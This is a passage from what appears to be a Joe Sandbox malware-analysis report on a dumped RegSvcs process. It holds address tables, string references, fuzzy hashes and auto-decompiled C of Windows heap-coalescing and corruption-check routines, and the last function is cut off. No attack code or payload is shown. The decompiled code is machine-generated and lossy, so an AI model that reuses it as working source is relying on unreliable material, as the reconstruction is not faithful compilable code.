0x01021c9e
0x01021cab
0x01021cb2
0x00000000
0x01021cb2
0x01021c8d
0x01021c92
0x00000000
0x00000000
0x01021c94
0x01021c98
0x00000000
0x00000000
0x00000000
0x01021c98
0x00fda265
0x00fda265
0x00fda266
0x00fda26f
0x00fda270
0x00fda276
0x00fda277
0x00fda279
0x00fda27e
0x00fda282
0x01021db5
0x01021dbb
0x01021dc1
0x01021dc5
0x01021de4
0x01021de9
0x01021dc7
0x01021ddc
0x01021de1
0x01021def
0x01021df3
0x01021df7
0x01021dfe
0x01021e06
0x00fda302
0x00fda308
0x00fda308
0x00fda288
0x00fda28d
0x00fda294
0x01021cc1
0x00fda29a
0x00fda29a
0x00fda29a
0x00fda29f
0x01021ccb
0x01021cd1
0x01021cd8
0x01021cea
0x01021cea
0x01021cd8
0x00fda2a9
0x00fda2af
0x00fda2bc
0x01021cfd
0x00fda2c2
0x00fda2c2
0x00fda2c2
0x00fda2c7
0x01021d07
0x01021d0d
0x01021d14
0x01021d1f
0x01021d21
0x01021d2c
0x01021d2c
0x01021d2c
0x01021d47
0x01021d47
0x01021d14
0x00fda2cd
0x00fda2d2
0x00fda2d9
0x01021d5a
0x00fda2df
0x00fda2df
0x00fda2df
0x00fda2e4
0x01021d69
0x01021d6b
0x01021d76
0x01021d76
0x01021d76
0x01021d91
0x01021d91
0x00fda2ea
0x00fda2f0
0x00fda2f5
0x01021da8
0x01021dad
0x01021dad
0x00fda2fd
0x00fda300
0x00000000

Strings

`, xrefs: 01021C8D
HEAP: , xrefs: 01021DE4
HEAP[%wZ]: , xrefs: 01021DD7
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 01021DF9

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 78531f8be6eb28c01a08938270d9d2575fbf18957c72210ba5da94f2a594e9df
Instruction ID: a76aff74491efba4af7f38fc9fb6871e1ab26df552200a277f84938414b36422
Opcode Fuzzy Hash: 78531f8be6eb28c01a08938270d9d2575fbf18957c72210ba5da94f2a594e9df
Instruction Fuzzy Hash: AD5105322046809FD322EB69CC45F6777EAFF84B50F180469F9918B392D775D900DB66

Uniqueness

Uniqueness Score: -1.00%

Function 010749A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01074A4A, 01074A5D, 01074A5F, 01074AC4
HEAP[%wZ]: , xrefs: 01074A3D, 01074AB7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01074A61
This is located in the %s field of the heap header., xrefs: 01074AD6

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 0628a9a0b06f71b1016091f58d3279cf3a8fd616688530cb62c8e45055236bf2
Instruction ID: bf28e6629c4738e68660f1c763ccdbd13b5c825c1f521798a111ae36769e3b40
Opcode Fuzzy Hash: 0628a9a0b06f71b1016091f58d3279cf3a8fd616688530cb62c8e45055236bf2
Instruction Fuzzy Hash: 3B31F231600114FFD711EB9DC886FAA77E8EF04720F1440A5F545DB2A2D7B4E844DA6D

Uniqueness

Uniqueness Score: -1.00%

Function 00FD99BF Relevance: 4.3, Strings: 3, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E00FD99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0106FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E0107A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0100D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E00FBB150();
										} else {
											E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E00FBB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x10a6378 = 1;
											asm("int3");
											 *0x10a6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E00FDA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E00FDA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E00FDBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E0107A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E00FDA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E00FDA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0100D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E00FBB150();
								} else {
									E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E00FBB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x10a6378 = 1;
									asm("int3");
									 *0x10a6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0106FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E0107A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0100D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E00FBB150();
													} else {
														E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E00FBB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x10a6378 = 1;
														asm("int3");
														 *0x10a6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E00FDA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E00FDA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E00FDBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E0107A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0100D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E00FBB150();
													} else {
														E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E00FBB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x10a6378 = 1;
														asm("int3");
														 *0x10a6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E00FDA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E00FDA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E00FDBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E00FDBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}

0x00fd99ca
0x00fd99cc
0x00fd99df
0x00fd99e3
0x00fd99f8
0x00fd99fb
0x00fd99fb
0x00000000
0x00fd9a48
0x00fd9a48
0x00fd9a4c
0x00fd9a51
0x00fd9a55
0x00fd9a61
0x00fd9a66
0x00fd9a68
0x01021457
0x0102145c
0x0102145c
0x00fd9a68
0x00fd9a6e
0x00fd9a71
0x00fd9a74
0x00fd9a76
0x01021466
0x01021469
0x01021469
0x0102146c
0x0102146e
0x01021471
0x01021474
0x01021477
0x01021479
0x0102159c
0x0102159c
0x0102159d
0x010215a6
0x010215ab
0x010215ab
0x00000000
0x010215ab
0x0102147f
0x01021481
0x00000000
0x00000000
0x0102148a
0x0102148d
0x01021493
0x01021495
0x010214c0
0x010214c0
0x010214c3
0x010214c6
0x010214c8
0x010214cb
0x010214cf
0x010214f2
0x010214f2
0x010214f5
0x010214f8
0x01021501
0x01021508
0x0102150b
0x0102150e
0x01021510
0x01021513
0x01021515
0x01021515
0x01021518
0x01021518
0x01021513
0x01021521
0x01021525
0x0102152a
0x0102152d
0x01021530
0x01021532
0x01021539
0x0102153d
0x0102155d
0x01021562
0x0102153f
0x01021555
0x0102155a
0x01021570
0x01021577
0x0102157c
0x01021582
0x01021585
0x01021589
0x0102158b
0x01021592
0x01021593
0x01021593
0x01021589
0x01021530
0x00000000
0x010214f8
0x010214d5
0x010214da
0x010214dc
0x00000000
0x010214de
0x010214e8
0x00000000
0x010214e8
0x01021497
0x01021497
0x010214a4
0x010214a4
0x010214a7
0x010214a9
0x010214ab
0x010214ab
0x0102149c
0x0102149e
0x010214a0
0x010214b0
0x010214b0
0x00000000
0x010214a2
0x010214a2
0x00000000
0x010214a2
0x010214a0
0x010214b3
0x010214bb
0x00000000
0x010214bb
0x01021495
0x00fd9a7c
0x00fd9a7c
0x00fd9a7f
0x00fd9a7f
0x00fd9a82
0x00fd9a84
0x00fd9a87
0x00fd9a8a
0x00fd9a8d
0x00fd9a8f
0x0102166a
0x0102166a
0x0102166b
0x01021674
0x00000000
0x01021674
0x00fd9a95
0x00fd9a97
0x00000000
0x00000000
0x00fd9aa0
0x00fd9aa3
0x00fd9aa9
0x00fd9aab
0x00fd9ad7
0x00fd9ad7
0x00fd9ada
0x00fd9add
0x00fd9adf
0x00fd9ae2
0x00fd9ae6
0x00fd9b22
0x00fd9b27
0x00fd9b29
0x00000000
0x00fd9b2b
0x010215be
0x00000000
0x010215be
0x00fd9b29
0x00fd9ae8
0x00fd9ae8
0x00fd9aeb
0x00fd9aee
0x010215cb
0x010215d2
0x010215d5
0x010215d7
0x010215da
0x010215dc
0x010215dc
0x010215dc
0x010215da
0x010215e5
0x010215e9
0x010215ee
0x010215f1
0x010215f3
0x010215f9
0x01021600
0x01021604
0x01021624
0x01021629
0x01021606
0x0102161c
0x01021621
0x01021637
0x0102163e
0x01021643
0x01021649
0x0102164c
0x01021650
0x01021656
0x0102165d
0x0102165e
0x0102165e
0x01021650
0x010215f3
0x00fd9af4
0x00fd9af7
0x00fd9afc
0x00fd9b00
0x00fd9b04
0x00fd9b08
0x00fd9b14
0x00fd99fe
0x00fd9a04
0x00fd9a07
0x00000000
0x00fd9a29
0x0102169c
0x010216a0
0x010216a5
0x010216a9
0x010216b5
0x010216ba
0x010216bc
0x010216be
0x010216c3
0x010216c3
0x010216bc
0x010216c8
0x010216cc
0x0102181b
0x0102181b
0x0102181e
0x0102181e
0x01021821
0x01021823
0x01021826
0x01021829
0x0102182c
0x0102182e
0x01021688
0x01021688
0x01021689
0x0102168b
0x0102168c
0x0102168d
0x0102168f
0x01021692
0x00000000
0x01021692
0x01021834
0x01021836
0x00000000
0x00000000
0x0102183f
0x01021842
0x01021848
0x0102184a
0x01021875
0x01021875
0x01021878
0x0102187b
0x0102187d
0x01021880
0x01021884
0x010218a7
0x010218a7
0x010218aa
0x010218ad
0x010218b6
0x010218bd
0x010218c0
0x010218c3
0x010218c5
0x010218c8
0x010218ca
0x010218ca
0x010218cd
0x010218cd
0x010218c8
0x010218d5
0x010218da
0x010218df
0x010218e2
0x010218e5
0x010218e7
0x010218ee
0x010218f2
0x01021912
0x01021917
0x010218f4
0x0102190a
0x0102190f
0x01021925
0x0102192c
0x01021931
0x0102193a
0x0102193e
0x01021940
0x01021947
0x01021948
0x01021948
0x0102193e
0x010218e5
0x0102194f
0x01021952
0x01021956
0x0102195d
0x01021961
0x0102196d
0x00000000
0x0102196d
0x0102188a
0x0102188f
0x01021891
0x00000000
0x00000000
0x0102189d
0x00000000
0x0102189d
0x0102184c
0x01021859
0x01021859
0x0102185c
0x00000000
0x00000000
0x01021851
0x01021853
0x01021855
0x01021865
0x01021865
0x01021866
0x01021868
0x01021870
0x00000000
0x01021870
0x01021857
0x01021857
0x0102185e
0x00000000
0x010216d2
0x010216d2
0x010216d5
0x010216d5
0x010216d8
0x010216da
0x010216dd
0x010216e0
0x010216e3
0x010216e5
0x01021808
0x01021808
0x01021809
0x01021812
0x01021817
0x01021817
0x00000000
0x01021817
0x010216eb
0x010216ed
0x00000000
0x00000000
0x010216f6
0x010216f9
0x010216ff
0x01021701
0x0102172c
0x0102172c
0x0102172f
0x01021732
0x01021734
0x01021737
0x0102173b
0x0102175e
0x0102175e
0x01021761
0x01021764
0x0102176d
0x01021774
0x01021777
0x0102177a
0x0102177c
0x0102177f
0x01021781
0x01021781
0x01021784
0x01021784
0x0102177f
0x0102178c
0x01021791
0x01021796
0x01021799
0x0102179c
0x0102179e
0x010217a5
0x010217a9
0x010217c9
0x010217ce
0x010217ab
0x010217c1
0x010217c6
0x010217dc
0x010217e3
0x010217e8
0x010217ee
0x010217f1
0x010217f5
0x010217f7
0x010217fe
0x010217ff
0x010217ff
0x010217f5
0x0102179c
0x00000000
0x01021764
0x01021741
0x01021746
0x01021748
0x00000000
0x00000000
0x01021754
0x00000000
0x01021754
0x01021703
0x01021710
0x01021710
0x01021713
0x00000000
0x00000000
0x01021708
0x0102170a
0x0102170c
0x0102171c
0x0102171c
0x0102171d
0x0102171f
0x01021727
0x00000000
0x01021727
0x0102170e
0x0102170e
0x01021715
0x00000000
0x01021715
0x010216cc
0x00fd9a45
0x00fd9a45
0x00fd9a0e
0x00fd9a1c
0x00fd9a23
0x0102167e
0x0102167f
0x01021681
0x01021683
0x01021684
0x00000000
0x01021684
0x00000000
0x00fd9aad
0x00fd9aad
0x00fd9ab0
0x00fd9ab3
0x00fd9ab3
0x00fd9ab6
0x00000000
0x00000000
0x00fd9ab8
0x00fd9aba
0x00fd9abc
0x00fd9ac8
0x00fd9ac8
0x00000000
0x00fd9abe
0x00fd9abe
0x00fd9ac0
0x00000000
0x00fd9ac0
0x00fd9abc
0x00fd9ad2
0x00000000
0x00fd9ad2
0x00fd9aab

Strings

HEAP: , xrefs: 0102155D, 01021624, 010217C9, 01021912
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01021572, 01021639, 010217DE, 01021927
HEAP[%wZ]: , xrefs: 01021550, 01021617, 010217BC, 01021905

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 3928a8fbb7358073430b23fcdd0b65883ffc088c6134c6df3d2143c2f9bb5c36
Instruction ID: 15ff65036e615e9287a04dfbf3c21e2909bc61076edb1f48a674ba3d9a1edbdf
Opcode Fuzzy Hash: 3928a8fbb7358073430b23fcdd0b65883ffc088c6134c6df3d2143c2f9bb5c36
Instruction Fuzzy Hash: 83221670A00251DFEB25CF6DC895B7ABBF6EF44704F2885AAE4858B382D775D881CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC8794 Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00FC8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
